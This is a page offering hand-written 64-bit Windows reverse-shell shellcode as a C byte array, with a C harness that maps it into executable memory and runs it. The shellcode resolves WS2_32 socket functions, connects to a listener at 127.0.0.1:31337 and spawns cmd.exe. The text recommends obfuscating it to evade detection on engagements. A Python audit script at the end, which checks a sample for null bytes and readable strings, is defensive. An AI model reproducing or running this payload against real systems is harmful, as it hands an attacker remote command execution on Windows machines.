Hand-written Windows TCP Reverse-Shell Shellcode (64-bit).
On its own, it's probably heavily signatured, so you might want to employ some encoding or obfuscation if you plan on using this on any engagements XD. There are also tons of examples and alternative ways of doing this on the internet, and the ol' Metasploit Framework exists, so you could use that too. Otherwise, if you're interested in how this stuff works, this will hopefully prove to be a helpful resource. It does contain some null bytes, but that's an easy fix (in many ways). Some optimizations could also shave off a few bytes, but I'm relatively certain that you won't get Windows shellcode to reliably spawn a reverse shell in fewer than 500 bytes.
You know the drill; this right here is for educational and/or ethical hacking purposes only. If you hack while wearing a black hat, hold your L with grace.
But, seriously: This offensive capability is provided for educational and ethical hacking purposes only. The creator of this tool does not condone or support any illegal or unethical use of this software. Any misuse, including but not limited to unauthorized access to computer systems or networks, is the sole responsibility of the individual using the tool. By downloading or using this software, you agree to use it in compliance with all applicable laws and regulations. The creator disclaims any liability for any damages or legal consequences arising from the use or misuse of this tool.
Here's some code you can use to test the shellcode:
#include <windows.h>
#include <string.h>

// Minimal test harness: copies the payload into an executable page and jumps to it.
int main(void) {
    unsigned char CustomShellcode[] =
"\x48\x33\xC9\x48\x33\xDB\x4D\x33\xD2\x65\x4C\x8B\x69\x60\x4D\x8B\x6D\x18\x49\x8B\x75\x20\x48\xAD\x48"
"\x96\x48\xAD\x4D\x33\xED\x4C\x8B\x78\x20\x45\x8B\x77\x3C\x4D\x03\xF7\x48\xFF\xC1\x48\xFF\xC1\x48\xC1"
"\xE1\x06\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF"
"\xC1\x41\x8B\x14\x0E\x49\x03\xD7\x8B\x42\x14\x8B\x5A\x20\x49\x03\xDF\x8B\xC8\x48\xB8\x47\x65\x74\x50"
"\x72\x6F\x63\x41\x67\xE3\x12\x4D\x33\xD2\x44\x8B\x54\x8B\x04\x4D\x03\xD7\xFF\xC9\x49\x39\x02\x75\xEB"
"\x48\x33\xDB\x8B\x5A\x24\x49\x03\xDF\x48\xFF\xC1\x66\x44\x8B\x2C\x4B\x4D\x33\xDB\x48\x33\xDB\x44\x8B"
"\x5A\x1C\x4D\x03\xDF\x43\x8B\x5C\xAB\x04\x49\x03\xDF\x48\x33\xC0\x48\xC7\xC0\x61\x72\x79\x41\x50\x48"
"\xB8\x4C\x6F\x61\x64\x4C\x69\x62\x72\x50\x48\x8B\xD4\x49\x8B\xCF\x48\x83\xEC\x30\xFF\xD3\x48\x83\xC4"
"\x30\x4C\x8B\xF0\x48\x33\xC0\x48\xC7\xC0\x6C\x6C\x00\x00\x50\x48\xB8\x57\x53\x32\x5F\x33\x32\x2E\x64"
"\x50\x48\x8B\xCC\x48\x83\xEC\x30\x41\xFF\xD6\x4C\x8B\xF0\x48\x83\xC4\x30\x48\x33\xC0\x48\xC7\xC0\x75"
"\x70\x00\x00\x50\x48\xB8\x57\x53\x41\x53\x74\x61\x72\x74\x50\x48\x8B\xD4\x49\x8B\xCE\x48\x83\xEC\x30"
"\xFF\xD3\x48\x83\xC4\x30\x4C\x8B\xD8\x48\x33\xC9\x66\xB9\x98\x01\x48\x2B\xE1\x48\x8B\xD4\x66\xB9\x02"
"\x02\x48\x83\xEC\x30\x41\xFF\xD3\x48\x83\xC4\x30\x48\x33\xC0\x48\xC7\xC0\x74\x41\x00\x00\x50\x48\xB8"
"\x57\x53\x41\x53\x6F\x63\x6B\x65\x50\x48\x8B\xD4\x49\x8B\xCE\x48\x83\xEC\x30\xFF\xD3\x48\x83\xC4\x30"
"\x4C\x8B\xD8\x48\x33\xC9\x48\x83\xEC\x30\x48\x89\x4C\x24\x20\x48\x89\x4C\x24\x28\x4C\x8B\xC1\x48\xFF"
"\xC1\x48\x8B\xD1\x48\xFF\xC1\x49\x83\xC0\x06\x4D\x33\xC9\x41\xFF\xD3\x4C\x8B\xE8\x48\x83\xC4\x30\x48"
"\x33\xC0\x48\xC7\xC0\x63\x74\x00\x00\x50\x48\xB8\x57\x53\x41\x43\x6F\x6E\x6E\x65\x50\x48\x8B\xD4\x49"
"\x8B\xCE\x48\x83\xEC\x30\xFF\xD3\x4C\x8B\xE0\x49\x8B\xCD\x49\xC7\xC0\x7F\x00\x00\x01\x41\x50\x66\x41"
"\xB8\x7A\x69\x66\x41\x50\x4D\x33\xC0\x49\xFF\xC0\x49\xFF\xC0\x49\x8B\xD0\x66\x52\x49\xC7\xC0\x16\x00"
"\x00\x00\x4D\x33\xC9\x48\x8B\xD4\x41\x51\x41\x51\x41\x51\x48\x83\xEC\x30\x41\xFF\xD4\x48\x33\xC0\x48"
"\xB8\x6F\x63\x65\x73\x73\x41\x00\x00\x50\x48\xB8\x43\x72\x65\x61\x74\x65\x50\x72\x50\x48\x8B\xD4\x49"
"\x8B\xCF\x48\x83\xEC\x30\xFF\xD3\x48\x83\xC4\x30\x4C\x8B\xE0\x48\x33\xC0\x48\xB8\x63\x6D\x64\x2E\x65"
"\x78\x65\x00\x50\x48\x8B\xCC\x41\x55\x41\x55\x41\x55\x48\x33\xDB\x66\x53\x53\x53\x48\xC7\xC3\x00\x01"
"\x00\x00\x66\x53\x48\x33\xDB\x66\x53\x66\x53\x53\x53\x53\x53\x53\x53\x48\xC7\xC3\x68\x00\x00\x00\x53"
"\x48\x8B\xFC\x48\xFF\xC4\x48\xFF\xC4\x48\xFF\xC4\x48\xFF\xC4\x48\x8B\xDC\x48\x83\xEB\x20\x53\x57\x48"
"\x33\xDB\x53\x53\x53\x48\xFF\xC3\x53\x48\x33\xDB\x53\x53\x53\x53\x4C\x8B\xC3\x4C\x8B\xCB\x48\x8B\xD1"
"\x48\x8B\xCB\x41\xFF\xD4";
    // In case DEP is enabled on the system, allocate an executable buffer in which
    // to store the payload. sizeof() also includes the literal's terminating NUL,
    // which is harmless here.
    void* ExecutableBuffer = VirtualAlloc(0, sizeof(CustomShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!ExecutableBuffer) return 1;
    memcpy(ExecutableBuffer, CustomShellcode, sizeof(CustomShellcode));

    // Call a Win32 API function with the payload as a callback, which transfers
    // execution into the buffer.
    EnumWindows((WNDENUMPROC)ExecutableBuffer, NULL);
    return 0;
}
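Since the write-up says the blob is heavily signatured and carries a few null bytes, a quick way to see both is to parse the C literal back into bytes, list the null-byte offsets, and pull out the cleartext API-name fragments that the immediates leave behind (the same thing a `strings` pass or a naive YARA rule would key on). This Python audit script is an added example, not the author's code; SAMPLE is a constructed three-line stand-in in the same "\xNN" format, and the parser only handles that escape form because that is all this page uses.

```python
import re

# Printable ASCII range used for the string scan (same as `strings` defaults).
PRINTABLE = range(0x20, 0x7F)

# Constructed sample in the page's literal format (not the real payload):
# a MOV RAX,imm64 carrying "GetProcA", a MOV with two embedded NULs, and "WS2_32.d".
SAMPLE = r'''
"\x48\xB8\x47\x65\x74\x50\x72\x6F\x63\x41"
"\x48\xC7\xC0\x6C\x6C\x00\x00\x50"
"\x48\xB8\x57\x53\x32\x5F\x33\x32\x2E\x64";
'''


def parse_c_escapes(literal):
    """Collect every \\xNN escape from a C string literal body and return raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))


def null_offsets(buf):
    """Offsets of 0x00 bytes, i.e. what would break a C-string style copy."""
    return [i for i, b in enumerate(buf) if b == 0]


def ascii_strings(buf, min_len=4):
    """(offset, text) for each run of printable ASCII at least min_len long."""
    found, start = [], None
    for i, b in enumerate(buf + b"\x00"):  # sentinel closes a trailing run
        if b in PRINTABLE:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                found.append((start, buf[start:i].decode("ascii")))
            start = None
    return found


def audit(literal):
    """Size, null-byte offsets and cleartext strings for a shellcode literal."""
    buf = parse_c_escapes(literal)
    return {"size": len(buf), "nulls": null_offsets(buf), "strings": ascii_strings(buf)}


if __name__ == "__main__":
    for key, value in audit(SAMPLE).items():
        print(f"{key}: {value}")
```

Paste the full literal body in place of SAMPLE to check the real payload; note that adjacent opcode bytes such as 0x48 ('H') get absorbed into the runs, which is exactly what a naive string scanner sees too.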